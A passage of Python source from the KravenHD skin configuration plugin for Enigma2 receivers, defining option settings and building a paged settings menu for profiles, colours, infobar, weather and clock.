ConfigText(default=\"70AD11\")\n\nconfig.plugins.KravenHD.PermanentClock = ConfigSelection(default=\"permanentclock-infobar-big\", choices = [\n\t\t\t\t(\"permanentclock-infobar-big\", _(\"infobar colors big\")),\n\t\t\t\t(\"permanentclock-infobar-small\", _(\"infobar colors small\")),\n\t\t\t\t(\"permanentclock-global-big\", _(\"global colors big\")),\n\t\t\t\t(\"permanentclock-global-small\", _(\"global colors small\")),\n\t\t\t\t(\"permanentclock-transparent-big\", _(\"transparent big\")),\n\t\t\t\t(\"permanentclock-transparent-small\", _(\"transparent small\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.KravenIconVPosition = ConfigSelection(default=\"vposition-2\", choices = [\n\t\t\t\t(\"vposition-3\", _(\"-3\")),\n\t\t\t\t(\"vposition-2\", _(\"-2\")),\n\t\t\t\t(\"vposition-1\", _(\"-1\")),\n\t\t\t\t(\"vposition0\", _(\"0\")),\n\t\t\t\t(\"vposition+1\", _(\"+1\")),\n\t\t\t\t(\"vposition+2\", _(\"+2\")),\n\t\t\t\t(\"vposition+3\", _(\"+3\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.SkinResolution = ConfigSelection(default=\"hd\", choices = [\n\t\t\t\t(\"hd\", _(\"HD\")),\n\t\t\t\t(\"fhd\", _(\"FHD\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.PopupStyle = ConfigSelection(default=\"popup-grad-trans\", choices = [\n\t\t\t\t(\"popup-grad-trans\", _(\"gradient transparent\")),\n\t\t\t\t(\"popup-grad\", _(\"gradient\")),\n\t\t\t\t(\"popup-box-trans\", _(\"box transparent\")),\n\t\t\t\t(\"popup-box\", _(\"box\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.IBProgressList = ConfigSelection(default=\"ffffff\", choices = ProgressList)\nconfig.plugins.KravenHD.IBProgressSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.IBProgress = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.IBProgressBackgroundList = ConfigSelection(default=\"1BA1E2\", choices = BorderSelfList)\nconfig.plugins.KravenHD.IBProgressBackgroundSelf = ConfigText(default=\"1BA1E2\")\nconfig.plugins.KravenHD.IBProgressBackground = ConfigText(default=\"1BA1E2\")\n\nconfig.plugins.KravenHD.IBProgressBorderLine = ConfigSelection(default=\"none\", choices = [\n\t\t\t\t(\"none\", _(\"off\")),\n\t\t\t\t(\"ib-progress-border\", _(\"border\")),\n\t\t\t\t(\"ib-progress-line\", _(\"line\"))\n\t\t\t\t])\n\nconfig.plugins.KravenHD.IBProgressBorderLineColorList = ConfigSelection(default=\"ffffff\", choices = ColorSelfList)\nconfig.plugins.KravenHD.IBProgressBorderLineColorSelf = ConfigText(default=\"ffffff\")\nconfig.plugins.KravenHD.IBProgressBorderLineColor = ConfigText(default=\"ffffff\")\n\nconfig.plugins.KravenHD.InfobarSelfColorR = ConfigSlider(default=0, increment=5, limits=(0, 255))\nconfig.plugins.KravenHD.InfobarSelfColorG = ConfigSlider(default=0, increment=5, limits=(0, 255))\nconfig.plugins.KravenHD.InfobarSelfColorB = ConfigSlider(default=0, increment=5, limits=(0, 255))\nconfig.plugins.KravenHD.BackgroundSelfColorR = ConfigSlider(default=0, increment=5, limits=(0, 255))\nconfig.plugins.KravenHD.BackgroundSelfColorG = ConfigSlider(default=0, increment=5, limits=(0, 255))\nconfig.plugins.KravenHD.BackgroundSelfColorB = ConfigSlider(default=75, increment=5, limits=(0, 255))\n\nclass KravenHD(ConfigListScreen, Screen):\n\n\tif DESKTOP_WIDTH <= 1280:\n\t skin = \"\"\"\n\n \n \n Default\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n\"\"\"\n\telse:\n\t skin = \"\"\"\n\n \n \n Default\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n\"\"\"\n\n\tdef __init__(self, session, args = None, picPath = None):\n\t\tself.skin_lines = []\n\t\tScreen.__init__(self, session)\n\t\tself.session = session\n\t\tself.datei = \"/usr/share/enigma2/KravenHD/skin.xml\"\n\t\tself.dateiTMP = self.datei + \".tmp\"\n\t\tself.picPath = \"/usr/lib/enigma2/python/Plugins/Extensions/KravenHD/images/\"\n\t\tself.profiles = \"/etc/enigma2/\"\n\t\tself.Scale = AVSwitch().getFramebufferScale()\n\t\tself.PicLoad = ePicLoad()\n\t\tself[\"helperimage\"] = Pixmap()\n\t\tself[\"Canvas\"] = CanvasSource()\n\t\tself[\"help\"] = StaticText()\n\t\tself[\"version\"] = StaticText()\n\n\t\tlist = []\n\t\tConfigListScreen.__init__(self, list)\n\n\t\tself[\"actions\"] = ActionMap([\"KravenHDConfigActions\", \"OkCancelActions\", \"DirectionActions\", \"ColorActions\", \"InputActions\"],\n\t\t{\n\t\t\t\"upUp\": self.keyUpLong,\n\t\t\t\"downUp\": self.keyDownLong,\n\t\t\t\"up\": self.keyUp,\n\t\t\t\"down\": self.keyDown,\n\t\t\t\"left\": self.keyLeft,\n\t\t\t\"right\": self.keyRight,\n\t\t\t\"red\": self.redbutton,\n\t\t\t\"green\": self.save,\n\t\t\t\"yellow\": self.categoryDown,\n\t\t\t\"blue\": self.categoryUp,\n\t\t\t\"cancel\": self.exit,\n\t\t\t\"pageup\": self.pageUp,\n\t\t\t\"papedown\": self.pageDown,\n\t\t\t\"ok\": self.OK\n\t\t}, -1)\n\n\t\tself[\"key_red\"] = StaticText()\n\t\tself[\"key_green\"] = StaticText(_(\"Save skin\"))\n\t\tself[\"key_yellow\"] = StaticText()\n\t\tself[\"key_blue\"] = StaticText()\n\t\tself[\"Title\"] = StaticText(_(\"Configuration tool for KravenHD\"))\n\n\t\tself.UpdatePicture()\n\n\t\tself.timer = eTimer()\n\t\tself.timer.callback.append(self.updateMylist)\n\t\tself.onLayoutFinish.append(self.updateMylist)\n\n\t\tself.lastProfile=\"0\"\n\n\t\tself.actClockstyle=\"\"\n\t\tself.actWeatherstyle=\"\"\n\t\tself.actChannelselectionstyle=\"\"\n\t\tself.actMenustyle=\"\"\n\t\tself.actCity=\"\"\n\t\tself.actCSItemHeight=\"\"\n\n\t\tself.skincolorinfobarcolor=\"\"\n\t\tself.skincolorbackgroundcolor=\"\"\n\n\t\tself.actListColorSelection=None\n\t\tself.actSelfColorSelection=None\n\n\t\tself.BoxName=self.getBoxName()\n\t\tself.Tuners=self.getTuners()\n\t\tself.InternetAvailable=self.getInternetAvailable()\n\t\tself.UserMenuIconsAvailable=self.getUserMenuIconsAvailable()\n\n\tdef mylist(self):\n\t\tself.timer.start(100, True)\n\n\tdef updateMylist(self):\n\n\t\tif config.plugins.KravenHD.customProfile.value!=self.lastProfile:\n\t\t\tself.loadProfile()\n\t\t\tself.lastProfile=config.plugins.KravenHD.customProfile.value\n\n\t\tlist = []\n\n\t\t# page 1\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"About\"), config.plugins.KravenHD.About, _(\"The KravenHD skin will be generated by this plugin according to your preferences. Make your settings and watch the changes in the preview window above. When finished, save your skin by pressing the green button and restart the GUI.\")))\n\t\tfor i in range(emptyLines+1):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 1 (category 2)\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"PROFILES ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryProfiles, _(\"This sections offers all profile settings. Different settings can be saved, modified, shared and cloned. Read the FAQs.\")))\n\t\tlist.append(getConfigListEntry(_(\"Active Profile / Save\"), config.plugins.KravenHD.customProfile, _(\"Select the profile you want to work with. Profiles are saved automatically on switching them or by pressing the OK button. New profiles will be generated based on the actual one. Profiles are interchangeable between boxes.\")))\n\t\tlist.append(getConfigListEntry(_(\"Default Profile / Reset\"), config.plugins.KravenHD.defaultProfile, _(\"Select the default profile you want to use when resetting the active profile (OK button). You can add your own default profiles under /etc/enigma2/kravenhd_default_n (n<=20).\")))\n\t\tfor i in range(emptyLines+1):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 1 (category 3)\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"SYSTEM ________________________________________________________________________________\"), config.plugins.KravenHD.CategorySystem, _(\"This sections offers all basic settings.\")))\n\t\tlist.append(getConfigListEntry(_(\"Skin Resolution\"), config.plugins.KravenHD.SkinResolution, _(\"Choose the resolution of the skin.\")))\n\t\tlist.append(getConfigListEntry(_(\"Icons (except Infobar)\"), config.plugins.KravenHD.IconStyle2, _(\"Choose between light and dark icons in system screens. The icons in the infobars are not affected.\")))\n\t\tlist.append(getConfigListEntry(_(\"Running Text (Delay)\"), config.plugins.KravenHD.RunningText, _(\"Choose the start delay for running text.\")))\n\t\tif not config.plugins.KravenHD.RunningText.value == \"none\":\n\t\t\tif config.plugins.KravenHD.SkinResolution.value == \"hd\":\n\t\t\t\tlist.append(getConfigListEntry(_(\"Running Text (Speed)\"), config.plugins.KravenHD.RunningTextSpeed, _(\"Choose the speed for running text.\")))\n\t\t\telse:\n\t\t\t\tlist.append(getConfigListEntry(_(\"Running Text (Speed)\"), config.plugins.KravenHD.RunningTextSpeed2, _(\"Choose the speed for running text.\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tlist.append(getConfigListEntry(_(\"Scrollbars\"), config.plugins.KravenHD.ScrollBar, _(\"Choose whether scrollbars should be shown.\")))\n\t\tlist.append(getConfigListEntry(_(\"Show Infobar-Background\"), config.plugins.KravenHD.IBColor, _(\"Choose whether you want to see the infobar background in all screens (bicolored background).\")))\n\t\tif self.InternetAvailable or self.UserMenuIconsAvailable:\n\t\t\tlist.append(getConfigListEntry(_(\"Menus\"), config.plugins.KravenHD.Logo, _(\"Choose from different options to display the system menus. Press red button for the FAQs with details on installing menu icons.\")))\n\t\t\tself.actMenustyle=config.plugins.KravenHD.Logo.value\n\t\t\tif config.plugins.KravenHD.Logo.value in (\"metrix-icons\", \"minitv-metrix-icons\"):\n\t\t\t\tlist.append(getConfigListEntry(_(\"Menu-Icons\"), config.plugins.KravenHD.MenuIcons, _(\"Choose from different icon sets for the menu screens. Many thanks to rennmaus and kleiner.teufel for their icon set.\")))\n\t\t\telse:\n\t\t\t\temptyLines+=1\n\t\telse:\n\t\t\tlist.append(getConfigListEntry(_(\"Menus\"), config.plugins.KravenHD.LogoNoInternet, _(\"Choose from different options to display the system menus. Press red button for the FAQs with details on installing menu icons.\")))\n\t\t\tself.actMenustyle=config.plugins.KravenHD.LogoNoInternet.value\n\t\t\temptyLines+=1\n\t\tlist.append(getConfigListEntry(_(\"Mainmenu Fontsize ('Standard' Style)\"), config.plugins.KravenHD.MainmenuFontsize, _(\"Choose the font size for 'Standard' mainmenus.\")))\n\t\tlist.append(getConfigListEntry(_(\"Mainmenu Title Color ('Horizontal' Styles)\"), config.plugins.KravenHD.MainmenuHorTitleFontList, _(\"Choose the title font color for 'Horizontal' and 'Horizontal-Icons' mainmenus.\")))\n\t\tlist.append(getConfigListEntry(_(\"Mainmenu Icons Gradient Color ('Horizontal-Icons' Style)\"), config.plugins.KravenHD.MainmenuHorIconColorList, _(\"Choose the gradient color of the icons for 'Horizontal-Icons' mainmenus.\")))\n\t\tfor i in range(emptyLines):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 2\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"GLOBAL COLORS ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryGlobalColors, _(\"This sections offers offers all basic color settings.\")))\n\t\tlist.append(getConfigListEntry(_(\"Background\"), config.plugins.KravenHD.BackgroundListColor, _(\"Choose the background for all screens. You can choose from a list of predefined colors or textures, create your own color using RGB sliders or define a color gradient. Also read the FAQs regarding your own textures.\")))\n\t\tif config.plugins.KravenHD.BackgroundListColor.value == \"gradient\":\n\t\t\tlist.append(getConfigListEntry(_(\" Primary Color\"), config.plugins.KravenHD.BackgroundGradientListColorPrimary, _(\"Choose the primary color for the background gradient. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\" Secondary Color\"), config.plugins.KravenHD.BackgroundGradientListColorSecondary, _(\"Choose the secondary color for the background gradient. Press OK to define your own RGB color.\")))\n\t\t\temptyLines+=1\n\t\telif config.plugins.KravenHD.BackgroundListColor.value == \"texture\":\n\t\t\tlist.append(getConfigListEntry(_(\" Texture\"), config.plugins.KravenHD.BackgroundTexture, _(\"Choose the texture for the background.\")))\n\t\t\tlist.append(getConfigListEntry(_(\" Alternate Color\"), config.plugins.KravenHD.BackgroundAlternateListColor, _(\"Choose the alternate color for the background. It should match the texture at the best. Press OK to define your own RGB color.\")))\n\t\t\temptyLines+=1\n\t\telse:\n\t\t\temptyLines+=3\n\t\tlist.append(getConfigListEntry(_(\"Background-Transparency\"), config.plugins.KravenHD.BackgroundColorTrans, _(\"Choose the degree of background transparency for all screens except channellists.\")))\n\t\tlist.append(getConfigListEntry(_(\"Listselection-Style\"), config.plugins.KravenHD.SelectionStyle, _(\"Choose from different options to display selection bars.\")))\n\t\tif config.plugins.KravenHD.SelectionStyle.value == \"color\":\n\t\t\tlist.append(getConfigListEntry(_(\" Color\"), config.plugins.KravenHD.SelectionBackgroundList, _(\"Choose the background color of selection bars. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\" Border\"), config.plugins.KravenHD.SelectionBorderList, _(\"Choose the border color of selection bars or deactivate borders completely. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\tlist.append(getConfigListEntry(_(\" Primary Color\"), config.plugins.KravenHD.SelectionBackgroundList, _(\"Choose the primary background color of selection bars. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\" Secondary Color\"), config.plugins.KravenHD.SelectionBackground2List, _(\"Choose the secondary background color of selection bars. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Listselection-Font\"), config.plugins.KravenHD.SelectionFontList, _(\"Choose the color of the font in selection bars. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Progress-/Volumebar\"), config.plugins.KravenHD.ProgressList, _(\"Choose the color of progress bars. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Border\"), config.plugins.KravenHD.BorderList, _(\"Choose the global border color. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"MiniTV-Border\"), config.plugins.KravenHD.MiniTVBorderList, _(\"Choose the border color of MiniTV's. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Lines\"), config.plugins.KravenHD.LineList, _(\"Choose the color of all lines. This affects dividers as well as the line in the center of some progress bars. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Primary-Font\"), config.plugins.KravenHD.Font1List, _(\"Choose the color of the primary font. The primary font is used for list items, textboxes and other important information. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Secondary-Font\"), config.plugins.KravenHD.Font2List, _(\"Choose the color of the secondary font. The secondary font is used for headers, labels and other additional information. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Marking-Font\"), config.plugins.KravenHD.MarkedFontList, _(\"Choose the font color of marked list items. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Colorbutton-Font\"), config.plugins.KravenHD.ButtonTextList, _(\"Choose the font color of the color button labels. Press OK to define your own RGB color.\")))\n\t\tfor i in range(emptyLines):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 3\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"INFOBAR-LOOK ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryInfobarLook, _(\"This sections offers all settings for the infobar-look.\")))\n\t\tlist.append(getConfigListEntry(_(\"Infobar-Style\"), config.plugins.KravenHD.InfobarStyle, _(\"Choose from different infobar styles. Please note that not every style provides every feature. Therefore some features might be unavailable for the chosen style.\")))\n\t\tlist.append(getConfigListEntry(_(\"Infobar-Background-Style\"), config.plugins.KravenHD.IBStyle, _(\"Choose from different infobar background styles.\")))\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\":\n\t\t\tlist.append(getConfigListEntry(_(\"Infobar-Box-Line\"), config.plugins.KravenHD.IBLineList, _(\"Choose the color of the infobar box lines. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tif config.plugins.KravenHD.IBStyle.value == \"grad\":\n\t\t\tlist.append(getConfigListEntry(_(\"Infobar-Background\"), config.plugins.KravenHD.InfobarGradientListColor, _(\"Choose the background for the infobars. You can choose from a list of predefined colors or textures or create your own color using RGB sliders.\")))\n\t\telse:\n\t\t\tlist.append(getConfigListEntry(_(\"Infobar-Background\"), config.plugins.KravenHD.InfobarBoxListColor, _(\"Choose the background for the infobars. You can choose from a list of predefined colors or textures, create your own color using RGB sliders or define a color gradient.\")))\n\t\tif config.plugins.KravenHD.IBStyle.value == \"box\" and config.plugins.KravenHD.InfobarBoxListColor.value == \"gradient\":\n\t\t\tlist.append(getConfigListEntry(_(\" Primary Color\"), config.plugins.KravenHD.InfobarGradientListColorPrimary, _(\"Choose the primary color for the infobar gradient. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\" Secondary Color\"), config.plugins.KravenHD.InfobarGradientListColorSecondary, _(\"Choose the secondary color for the infobar gradient. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\" Info Panels\"), config.plugins.KravenHD.InfoStyle, _(\"Choose gradient or color for the info panels (Sysinfos, Timeshiftbar etc.).\")))\n\t\telif config.plugins.KravenHD.IBStyle.value == \"box\" and config.plugins.KravenHD.InfobarBoxListColor.value == \"texture\":\n\t\t\tlist.append(getConfigListEntry(_(\" Texture\"), config.plugins.KravenHD.InfobarTexture, _(\"Choose the texture for the infobars.\")))\n\t\t\tlist.append(getConfigListEntry(_(\" Alternate Color\"), config.plugins.KravenHD.InfobarAlternateListColor, _(\"Choose the alternate color for the infobars. It should match the texture at the best. Press OK to define your own RGB color.\")))\n\t\t\temptyLines+=1\n\t\telif config.plugins.KravenHD.IBStyle.value == \"grad\" and config.plugins.KravenHD.InfobarGradientListColor.value == \"texture\":\n\t\t\tlist.append(getConfigListEntry(_(\" Texture\"), config.plugins.KravenHD.InfobarTexture, _(\"Choose the texture for the infobars.\")))\n\t\t\tlist.append(getConfigListEntry(_(\" Alternate Color\"), config.plugins.KravenHD.InfobarAlternateListColor, _(\"Choose the alternate color for the infobars. It should match the texture at the best. Press OK to define your own RGB color.\")))\n\t\t\temptyLines+=1\n\t\telse:\n\t\t\temptyLines+=3\n\t\tlist.append(getConfigListEntry(_(\"Infobar-Transparency\"), config.plugins.KravenHD.InfobarColorTrans, _(\"Choose the degree of background transparency for the infobars.\")))\n\t\tlist.append(getConfigListEntry(_(\"Primary-Infobar-Font\"), config.plugins.KravenHD.IBFont1List, _(\"Choose the color of the primary infobar font. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Secondary-Infobar-Font\"), config.plugins.KravenHD.IBFont2List, _(\"Choose the color of the secondary infobar font. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Infobar-Icons\"), config.plugins.KravenHD.IconStyle, _(\"Choose between light and dark infobar icons.\")))\n\t\tlist.append(getConfigListEntry(_(\"Eventname Fontsize\"), config.plugins.KravenHD.IBFontSize, _(\"Choose the font size of eventname.\")))\n\t\tlist.append(getConfigListEntry(_(\"Eventname effect\"), config.plugins.KravenHD.TypeWriter, _(\"Choose from different effects to display eventname.\")))\n\t\tlist.append(getConfigListEntry(_(\"Progress-Bar\"), config.plugins.KravenHD.IBProgressList, _(\"Choose the color of progress bar. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Progress-Background\"), config.plugins.KravenHD.IBProgressBackgroundList, _(\"Choose the color of progress bar background or deactivate it completely. Press OK to define your own RGB color.\")))\n\t\tlist.append(getConfigListEntry(_(\"Progress-Border/Line\"), config.plugins.KravenHD.IBProgressBorderLine, _(\"Choose whether progress bar displayed with border or line or without them.\")))\n\t\tif config.plugins.KravenHD.IBProgressBorderLine.value == \"ib-progress-border\":\n\t\t\tlist.append(getConfigListEntry(_(\"Progress-Border Color\"), config.plugins.KravenHD.IBProgressBorderLineColorList, _(\"Choose the border color of progress bar. Press OK to define your own RGB color.\")))\n\t\telif config.plugins.KravenHD.IBProgressBorderLine.value == \"ib-progress-line\":\n\t\t\tlist.append(getConfigListEntry(_(\"Progress-Line Color\"), config.plugins.KravenHD.IBProgressBorderLineColorList, _(\"Choose the line color of progress bar. Press OK to define your own RGB color.\")))\n\t\telse:\n\t\t\temptyLines+=1\n\t\tfor i in range(emptyLines):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 4\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"INFOBAR-CONTENTS ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryInfobarContents, _(\"This sections offers all settings for infobar-contents.\")))\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-x2\", \"infobar-style-z1\", \"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\tlist.append(getConfigListEntry(_(\"Busy color\"), config.plugins.KravenHD.TunerBusyList, _(\"Choose the color for engaged tuners. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Active color\"), config.plugins.KravenHD.TunerLiveList, _(\"Choose the color for the current live tuner. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Record color\"), config.plugins.KravenHD.TunerRecordList, _(\"Choose the color for recording tuners. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Active record color\"), config.plugins.KravenHD.TunerXtremeBusyList, _(\"Choose the color for the current live tuner when also recording. Press OK to define your own RGB color.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Show unused Tuners\"), config.plugins.KravenHD.ShowUnusedTuner, _(\"Choose whether unused tuners are displayed or not.\")))\n\t\telse:\n\t\t\temptyLines+=5\n\t\tif config.plugins.KravenHD.InfobarStyle.value == \"infobar-style-nopicon\":\n\t\t\tlist.append(getConfigListEntry(_(\"Infobox-Contents\"), config.plugins.KravenHD.Infobox2, _(\"Choose which informations will be shown in the info box.\")))\n\t\t\temptyLines+=1\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x1\", \"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\tlist.append(getConfigListEntry(_(\"Infobox-Contents\"), config.plugins.KravenHD.Infobox, _(\"Choose which informations will be shown in the info box.\")))\n\t\t\temptyLines+=1\n\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-zz1\", \"infobar-style-zzz1\"):\n\t\t\tlist.append(getConfigListEntry(_(\"Show AGC/SNR\"), config.plugins.KravenHD.ShowAgcSnr, _(\"Choose whether AGC/SNR are displayed or not.\")))\n\t\t\tif config.plugins.KravenHD.ShowAgcSnr.value == \"on\":\n\t\t\t\tlist.append(getConfigListEntry(_(\"Infobox-Contents\"), config.plugins.KravenHD.Infobox2, _(\"Choose which informations will be shown in the info box.\")))\n\t\t\telse:\n\t\t\t\tlist.append(getConfigListEntry(_(\"Infobox-Contents\"), config.plugins.KravenHD.Infobox, _(\"Choose which informations will be shown in the info box.\")))\n\t\telse:\n\t\t\temptyLines+=2\n\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-x2\", \"infobar-style-x3\", \"infobar-style-z1\", \"infobar-style-z2\", \"infobar-style-zz1\"):\n\t\t\tlist.append(getConfigListEntry(_(\"Channelname/-number\"), config.plugins.KravenHD.InfobarChannelName, _(\"Choose from different options to show the channel name and number in the infobar.\")))\n\t\t\tif not config.plugins.KravenHD.InfobarChannelName.value == \"none\":\n\t\t\t\tlist.append(getConfigListEntry(_(\"Channelname/-number-Font\"), config.plugins.KravenHD.ChannelnameFontList, _(\"Choose the font color of channel name and number. Press OK to define your own RGB color.\")))\n\t\t\telse:\n\t\t\t\temptyLines+=1\n\t\telse:\n\t\t\tlist.append(getConfigListEntry(_(\"Channelname/-number\"), config.plugins.KravenHD.InfobarChannelName2, _(\"Choose from different options to show the channel name and number in the infobar.\")))\n\t\t\tif not config.plugins.KravenHD.InfobarChannelName2.value == \"none\":\n\t\t\t\tlist.append(getConfigListEntry(_(\"Channelname/-number-Font\"), config.plugins.KravenHD.ChannelnameFontList, _(\"Choose the font color of channel name and number. Press OK to define your own RGB color.\")))\n\t\t\telse:\n\t\t\t\temptyLines+=1\n\t\tlist.append(getConfigListEntry(_(\"System-Infos\"), config.plugins.KravenHD.SystemInfo, _(\"Choose from different additional windows with system informations or deactivate them completely.\")))\n\t\tfor i in range(emptyLines+7):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 5\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"WEATHER ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryWeather, _(\"This sections offers all weather settings.\")))\n\t\tif self.InternetAvailable:\n\t\t\tif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-nopicon\", \"infobar-style-x1\", \"infobar-style-x3\", \"infobar-style-z2\", \"infobar-style-zz1\", \"infobar-style-zz2\", \"infobar-style-zz3\", \"infobar-style-zzz1\"):\n\t\t\t\tlist.append(getConfigListEntry(_(\"Weather\"), config.plugins.KravenHD.WeatherStyle, _(\"Choose from different options to show the weather in the infobar.\")))\n\t\t\t\tself.actWeatherstyle=config.plugins.KravenHD.WeatherStyle.value\n\t\t\telif config.plugins.KravenHD.InfobarStyle.value in (\"infobar-style-x2\", \"infobar-style-z1\"):\n\t\t\t\tif fileExists(\"/usr/lib/enigma2/python/Plugins/Extensions/Netatmo/plugin.py\"):\n\t\t\t\t\tlist.append(getConfigListEntry(_(\"Weather\"), config.plugins.KravenHD.WeatherStyle3, _(\"Activate or deactivate displaying the weather in the infobar.\")))\n\t\t\t\t\tself.actWeatherstyle=config.plugins.KravenHD.WeatherStyle3.value\n\t\t\t\telse:\n\t\t\t\t\tlist.append(getConfigListEntry(_(\"Weather\"), config.plugins.KravenHD.WeatherStyle2, _(\"Activate or deactivate displaying the weather in the infobar.\")))\n\t\t\t\t\tself.actWeatherstyle=config.plugins.KravenHD.WeatherStyle2.value\n\t\t\tlist.append(getConfigListEntry(_(\"Search option\"), config.plugins.KravenHD.msn_searchby, _(\"Choose from different options to enter your settings.\\nPress the red button to search for the weather code.\")))\n\t\t\tif config.plugins.KravenHD.msn_searchby.value == \"location\":\n\t\t\t\tlist.append(getConfigListEntry(_(\"Location \"), config.plugins.KravenHD.msn_cityname, _(\"Enter your location.\\nPress OK to use the virtual keyboard.\\nPress the red button to search for the weather code.\")))\n\t\t\telse:\n\t\t\t\temptyLines+=1\n\t\t\tlist.append(getConfigListEntry(_(\"Language\"), config.plugins.KravenHD.msn_language, _(\"Specify the language for the weather output.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Refresh interval (in minutes)\"), config.plugins.KravenHD.refreshInterval, _(\"Choose the frequency of loading weather data from the internet.\")))\n\t\t\tlist.append(getConfigListEntry(_(\"Weather-Style\"), config.plugins.KravenHD.WeatherView, _(\"Choose between graphical weather symbols and Meteo symbols.\")))\n\t\t\tif config.plugins.KravenHD.WeatherView.value == \"meteo\":\n\t\t\t\tlist.append(getConfigListEntry(_(\"Meteo-Color\"), config.plugins.KravenHD.MeteoColor, _(\"Choose between light and dark Meteo symbols.\")))\n\t\t\telse:\n\t\t\t\temptyLines+=1\n\t\telse:\n\t\t\tlist.append(getConfigListEntry(_(\"Weather\"), config.plugins.KravenHD.WeatherStyleNoInternet, _(\"You have no internet connection. This function is disabled.\")))\n\t\t\tself.actWeatherstyle=\"none\"\n\t\t\temptyLines+=6\n\t\tfor i in range(emptyLines+3):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 5 (category 2)\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"CLOCK ________________________________________________________________________________\"), config.plugins.KravenHD.CategoryClock, _(\"This sections offers all settings for the different clocks.\")))\n\t\tif self.InternetAvailable:\n\t\t\tlist.append(getConfigListEntry(_(\"Clock-Style\"), config.plugins.KravenHD.ClockStyle, _(\"Choose from different options to show the clock in the infobar.\")))\n\t\t\tself.actClockstyle=config.plugins.KravenHD.ClockStyle.value\n\t\t\tif self.actClockstyle == \"clock-analog\":\n\t\t\t\tlist.append(getConfigListEntry(_(\"Analog-Clock-Color\"), config.plugins.KravenHD.AnalogColorList, _(\"Choose from different colors for the analog type clock in the infobar.\")))\n\t\t\telif self.actClockstyle == \"clock-android\":\n\t\t\t\tlist.append(getConfigListEntry(_(\"Android-Temp-Color\"), config.plugins.KravenHD.AndroidList, _(\"Choose the font color of android-clock temperature. Press OK to define your own RGB color.\")))\n\t\t\telse:\n\t\t\t\temptyLines+=1\n\t\telse:\n\t\t\tlist.append(getConfigListEntry(_(\"Clock-Style\"), config.plugins.KravenHD.ClockStyleNoInternet, _(\"Choose from different options to show the clock in the infobar.\")))\n\t\t\tself.actClockstyle=config.plugins.KravenHD.ClockStyleNoInternet.value\n\t\t\temptyLines+=1\n\t\tfor i in range(emptyLines+4):\n\t\t\tlist.append(getConfigListEntry(_(\" \"), ))\n\n\t\t# page 6\n\t\temptyLines=0\n\t\tlist.append(getConfigListEntry(_(\"ECM INFOS ________________________________________________________________________________\"), 